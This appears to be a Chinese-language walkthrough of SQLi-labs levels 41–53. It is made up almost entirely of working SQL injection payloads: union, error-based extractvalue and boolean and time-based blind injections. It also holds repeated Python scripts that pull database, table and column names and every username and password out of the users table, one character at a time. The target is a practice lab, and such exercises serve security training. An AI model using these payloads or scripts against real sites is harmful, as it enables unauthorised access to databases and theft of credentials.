41、第四十一关
-1 union select 1,2,3--+
-1 union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+
-1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')--+
-1 union select 1,2,(select group_concat(username,'~',password) from security.users)--+
42、第四十二关
这关login_password是单引号闭合,可用布尔盲注
123'+or+1=1--+
上脚本爆库:
import string
import requests
numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]
if __name__ == '__main__':
test = True
# 获取正确返回内容长度
url = "http://sqli.labs/Less-42/login.php"
list1 = numbers + letters2 + fuhao
# 获取数据库名
database = ""
num = 0
print(f"数据库:")
for p in range(50):
if num > len(list1) * 2:
break
for a in list1:
num += 1
res = requests.post(url, {"login_user": "admin", "login_password": f"123' or substr(database(),{p},1)='{a}'#", "mysubmit": "Login"})
if len(res.text) == 1580:
database = f"{database}{a}"
print(a, end='')
num = 0
print("")
# 获取所有表名
num = 0
tables = ""
print(f"所有表名:")
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
num += 1
res = requests.post(url, {"login_user" : "admin", "login_password": f"123' or substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
if len(res.content) == 1580:
tables = f"{tables}{a}"
print(a, end='')
num = 0
print("")
# 获取users表所有字段
columns = ""
print(f"users表所有字段名:")
num = 0
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
num += 1
res = requests.post(url, {"login_user": "admin", "login_password": f"123' or substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
if len(res.content) == 1580:
columns = f"{columns}{a}"
print(a, end='')
num = 0
print("") # 换行
# 获取所有账号
users = ""
print(f"所有用户密码:")
num = 0
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
num += 1
res = requests.post(url, {"login_user": "admin", "login_password": f"123' or substr((select group_concat(username,':',password) from users),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
if len(res.content) == 1580:
users = f"{users}{a}"
print(a, end='')
num = 0
43、第四十三关
这关是POST请求,login_password参数单引号加括号闭合
POC:111')--+,有报错信息,可以用报错注入
111')+and+extractvalue(1,concat(0x7e,database(),0x7e))--+
111')+and+extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e))--+
111')+and+extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e))--+
111')+and+extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from security.users),0x7e))--+
44、第四十四关
POST请求,login_password参数单引号闭合
可以用布尔盲注,POC:123'+or+lenth(database())=1--+
这个脚本注入比较方便
import string
import requests
numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]
if __name__ == '__main__':
test = True
# 获取正确返回内容长度
url = "http://sqli.labs/Less-44/login.php"
list1 = numbers + letters2 + fuhao
# 获取数据库名
database = ""
num = 0
print(f"数据库:")
for p in range(50):
if num > len(list1) * 2:
break
for a in list1:
num += 1
res = requests.post(url, {"login_user": "admin", "login_password": f"123' or substr(database(),{p},1)='{a}'#", "mysubmit": "Login"})
if len(res.text) == 1580:
database = f"{database}{a}"
print(a, end='')
num = 0
print("")
# 获取所有表名
num = 0
tables = ""
print(f"所有表名:")
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
num += 1
res = requests.post(url, {"login_user" : "admin", "login_password": f"123' or substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
if len(res.content) == 1580:
tables = f"{tables}{a}"
print(a, end='')
num = 0
print("")
# 获取users表所有字段
columns = ""
print(f"users表所有字段名:")
num = 0
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
num += 1
res = requests.post(url, {"login_user": "admin", "login_password": f"123' or substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
if len(res.content) == 1580:
columns = f"{columns}{a}"
print(a, end='')
num = 0
print("") # 换行
# 获取所有账号
users = ""
print(f"所有用户密码:")
num = 0
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
num += 1
res = requests.post(url, {"login_user": "admin", "login_password": f"123' or substr((select group_concat(username,':',password) from users),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
if len(res.content) == 1580:
users = f"{users}{a}"
print(a, end='')
num = 0
45、第四十五关
这关是login_password参数单引号加括号闭合
可以使用布尔盲注POC:123')+or+substr(database(),1,1)='a'--+
脚本爆库
import string
import requests
numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]
if __name__ == '__main__':
test = True
# 获取正确返回内容长度
url = "http://sqli.labs/Less-45/login.php"
list1 = numbers + letters2 + fuhao
# 获取数据库名
database = ""
num = 0
print(f"数据库:")
for p in range(50):
if num > len(list1) * 2:
break
for a in list1:
num += 1
res = requests.post(url, {"login_user": "admin", "login_password": f"123') or substr(database(),{p},1)='{a}'#", "mysubmit": "Login"})
if len(res.text) == 1580:
database = f"{database}{a}"
print(a, end='')
num = 0
print("")
# 获取所有表名
num = 0
tables = ""
print(f"所有表名:")
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
num += 1
res = requests.post(url, {"login_user" : "admin", "login_password": f"123') or substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
if len(res.content) == 1580:
tables = f"{tables}{a}"
print(a, end='')
num = 0
print("")
# 获取users表所有字段
columns = ""
print(f"users表所有字段名:")
num = 0
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
num += 1
res = requests.post(url, {"login_user": "admin", "login_password": f"123') or substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
if len(res.content) == 1580:
columns = f"{columns}{a}"
print(a, end='')
num = 0
print("") # 换行
# 获取所有账号
users = ""
print(f"所有用户密码:")
num = 0
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
num += 1
res = requests.post(url, {"login_user": "admin", "login_password": f"123') or substr((select group_concat(username,':',password) from users),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
if len(res.content) == 1580:
users = f"{users}{a}"
print(a, end='')
num = 0
46、第四十六关
参数是sort
4+and+extractvalue(1,concat(0x7e,database()))
4+and+extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')))
4+and+extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') ))
47、第四十七关
sort=1
sort=2
sort=3
sort=4
应该是报错了,一共三个字段,不显示错误可以用时间盲注
48、第四十八关
和上一关差不多,这关单引号闭合
还是要时间盲注
脚本
import string
from time import time, sleep
import requests
numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]
if __name__ == '__main__':
test = True
# 获取正确返回内容长度
url = "http://sqli.labs/Less-48/?sort=1%20"
list1 = numbers + letters2 + fuhao
# 获取数据库名
database = ""
num = 0
print(f"数据库:")
for p in range(50):
if num > len(list1) * 2:
break
for a in list1:
num += 1
url_db = url + f"and%20substr(database(),{p},1)=%27{a}%27%20and%20sleep(1)"
stime = time() # 记录开始时间
res = requests.get(url_db)
etime = time() # 记录结束时间
if etime - stime > 13:
database = f"{database}{a}"
print(a, end='')
num = 0
print("")
# 获取所有表名
num = 0
tables = ""
print(f"所有表名:")
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
url_db = url + f"and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)"
num += 1
stime = time() # 记录开始时间
res = requests.get(url_db)
etime = time() # 记录结束时间
if etime - stime > 13:
tables = f"{tables}{a}"
print(a, end='')
num = 0
print("")
# 获取users表所有字段
columns = ""
print(f"users表所有字段名:")
num = 0
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
url_db = url + f"and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)"
num += 1
stime = time() # 记录开始时间
res = requests.get(url_db)
etime = time() # 记录结束时间
if etime - stime > 13:
columns = f"{columns}{a}"
print(a, end='')
num = 0
print("") # 换行
# 获取所有账号
users = ""
print(f"所有用户密码:")
num = 0
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
url_db = url + f"and%20substr((select group_concat(username,':',password) from users),{p},1)=%27{a}%27%20and%20sleep(1)"
num += 1
stime = time() # 记录开始时间
res = requests.get(url_db)
etime = time() # 记录结束时间
if etime - stime > 13:
users = f"{users}{a}"
print(a, end='')
num = 0
49、第四十九关
和48关差不多,也是时间盲注,需要单引号闭合
上脚本
import string
from time import time, sleep
import requests
numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]
if __name__ == '__main__':
test = True
# 获取正确返回内容长度
url = "http://sqli.labs/Less-49/?sort=1%27%20"
list1 = numbers + letters2 + fuhao
# 获取数据库名
database = ""
num = 0
print(f"数据库:")
for p in range(50):
if num > len(list1) * 2:
break
for a in list1:
num += 1
url_db = url + f"and%20substr(database(),{p},1)=%27{a}%27%20and%20sleep(1)--+"
stime = time() # 记录开始时间
res = requests.get(url_db)
etime = time() # 记录结束时间
if etime - stime > 13:
database = f"{database}{a}"
print(a, end='')
num = 0
print("")
# 获取所有表名
num = 0
tables = ""
print(f"所有表名:")
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
url_db = url + f"and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)--+"
num += 1
stime = time() # 记录开始时间
res = requests.get(url_db)
etime = time() # 记录结束时间
if etime - stime > 13:
tables = f"{tables}{a}"
print(a, end='')
num = 0
print("")
# 获取users表所有字段
columns = ""
print(f"users表所有字段名:")
num = 0
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
url_db = url + f"and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)--+"
num += 1
stime = time() # 记录开始时间
res = requests.get(url_db)
etime = time() # 记录结束时间
if etime - stime > 13:
columns = f"{columns}{a}"
print(a, end='')
num = 0
print("") # 换行
# 获取所有账号
users = ""
print(f"所有用户密码:")
num = 0
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
url_db = url + f"and%20substr((select group_concat(username,':',password) from users),{p},1)=%27{a}%27%20and%20sleep(1)--+"
num += 1
stime = time() # 记录开始时间
res = requests.get(url_db)
etime = time() # 记录结束时间
if etime - stime > 13:
users = f"{users}{a}"
print(a, end='')
num = 0
50、第五十关
有报错信息,试一下报错注入
sort=10+and+extractvalue(1,concat(0x7e,database()))
sort=10+and+extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')))
sort=10+and+extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))
sort=10+and+extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from security.users)))
51、第五十一关
有报错信息,还得报错注入,单引号闭合
sort=3'+and+extractvalue(1,concat(0x7e,database()))--+
sort=3'+and+extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')))--+
sort=3'+and+extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))--+
sort=3'+and+extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from security.users)))--+
52、第五十二关
没有报错信息,得用盲注,时间盲注
上脚本
import string
from time import time, sleep
import requests
numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]
if __name__ == '__main__':
test = True
# 获取正确返回内容长度
url = "http://sqli.labs/Less-52/?sort=1%20"
list1 = numbers + letters2 + fuhao
# 获取数据库名
database = ""
num = 0
print(f"数据库:")
for p in range(50):
if num > len(list1) * 2:
break
for a in list1:
num += 1
url_db = url + f"and%20substr(database(),{p},1)=%27{a}%27%20and%20sleep(1)--+"
stime = time() # 记录开始时间
res = requests.get(url_db)
etime = time() # 记录结束时间
if etime - stime > 13:
database = f"{database}{a}"
print(a, end='')
num = 0
print("")
# 获取所有表名
num = 0
tables = ""
print(f"所有表名:")
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
url_db = url + f"and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)--+"
num += 1
stime = time() # 记录开始时间
res = requests.get(url_db)
etime = time() # 记录结束时间
if etime - stime > 13:
tables = f"{tables}{a}"
print(a, end='')
num = 0
print("")
# 获取users表所有字段
columns = ""
print(f"users表所有字段名:")
num = 0
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
url_db = url + f"and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)--+"
num += 1
stime = time() # 记录开始时间
res = requests.get(url_db)
etime = time() # 记录结束时间
if etime - stime > 13:
columns = f"{columns}{a}"
print(a, end='')
num = 0
print("") # 换行
# 获取所有账号
users = ""
print(f"所有用户密码:")
num = 0
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
url_db = url + f"and%20substr((select group_concat(username,':',password) from users),{p},1)=%27{a}%27%20and%20sleep(1)--+"
num += 1
stime = time() # 记录开始时间
res = requests.get(url_db)
etime = time() # 记录结束时间
if etime - stime > 13:
users = f"{users}{a}"
print(a, end='')
num = 0
53、第五十三关
单引号闭合,没有报错,还得是盲注
上脚本
python
import string
from time import time, sleep
import requests
numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]
if __name__ == '__main__':
test = True
# 获取正确返回内容长度
url = "http://sqli.labs/Less-53/?sort=22%27%20"
list1 = numbers + letters2 + fuhao
# 获取数据库名
database = ""
num = 0
print(f"数据库:")
for p in range(50):
if num > len(list1) * 2:
break
for a in list1:
num += 1
url_db = url + f"and%20substr(database(),{p},1)=%27{a}%27%20and%20sleep(0.5)--+"
stime = time() # 记录开始时间
res = requests.get(url_db)
etime = time() # 记录结束时间
if etime - stime > 5:
database = f"{database}{a}"
print(a, end='')
num = 0
print("")
# 获取所有表名
num = 0
tables = ""
print(f"所有表名:")
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
url_db = url + f"and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'%20and%20sleep(0.5)--+"
num += 1
stime = time() # 记录开始时间
res = requests.get(url_db)
etime = time() # 记录结束时间
if etime - stime > 5:
tables = f"{tables}{a}"
print(a, end='')
num = 0
print("")
# 获取users表所有字段
columns = ""
print(f"users表所有字段名:")
num = 0
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
url_db = url + f"and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'%20and%20sleep(0.5)--+"
num += 1
stime = time() # 记录开始时间
res = requests.get(url_db)
etime = time() # 记录结束时间
if etime - stime > 5:
columns = f"{columns}{a}"
print(a, end='')
num = 0
print("") # 换行
# 获取所有账号
users = ""
print(f"所有用户密码:")
num = 0
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
url_db = url + f"and%20substr((select group_concat(username,':',password) from users),{p},1)=%27{a}%27%20and%20sleep(0.5)--+"
num += 1
stime = time() # 记录开始时间
res = requests.get(url_db)
etime = time() # 记录结束时间
if etime - stime > 5:
users = f"{users}{a}"
print(a, end='')
num = 0